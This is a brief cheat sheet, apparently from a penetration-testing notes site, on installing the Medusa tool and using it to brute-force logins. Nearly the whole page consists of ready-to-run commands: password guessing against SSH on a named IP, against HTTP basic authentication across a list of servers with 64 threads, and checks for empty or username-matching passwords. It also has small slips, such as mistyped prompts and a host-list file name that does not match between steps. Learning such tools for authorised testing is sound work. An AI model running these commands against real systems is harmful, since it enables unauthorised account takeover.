MEDUSA

INSTALLATION

root@oco:~$ sudo apt update
root@oco:~$ sudo apt search medusa
root@oco:~$ sudo apt install medusa

BASIC USAGE

root@oco:~$ medusa -h
 medusa [target_options] [credential_options] -M module [module_options]

MODULES

Each module in Medusa is tailored to interact with specific authentication mechanisms, allowing it to send the appropriate requests and interpret responses for successful attacks

BRUTE FORCE: SSH

roto@oco:~$ nano usernames.txt
 ...
root@oco~:$ nano passwords.txt
 ...
 
root@oco:~$ medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

BRUTE FORCE: BASIC HTTP AUTHENTICATION

root@oco:~$ nano webServers.txt
 ...
roto@oco:~$ nano usernames.txt
 ...
root@oco~:$ nano passwords.txt
 ...
 
root@oco:~$ medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET -t 64

BRUTE FORCE: EMPTY OR DEFAULT PASSWORDS

roto@oco:~$ nano usernames.txt
 ...
 
root@oco:~$ medusa -h 10.0.0.5 -U usernames.txt -e ns -M {service_name}
 * the -e n represents additional checks for empty passwords
 * the -e s represents additional checks for passwords matching the username
 * replace the {service_name} with the appropriate service module
 
 * Medusa will try each username with an empty password and then with the password matching the username, potentially revealing accounts with weak or default configurations.
PreviousHYDRANextFFUF

Last updated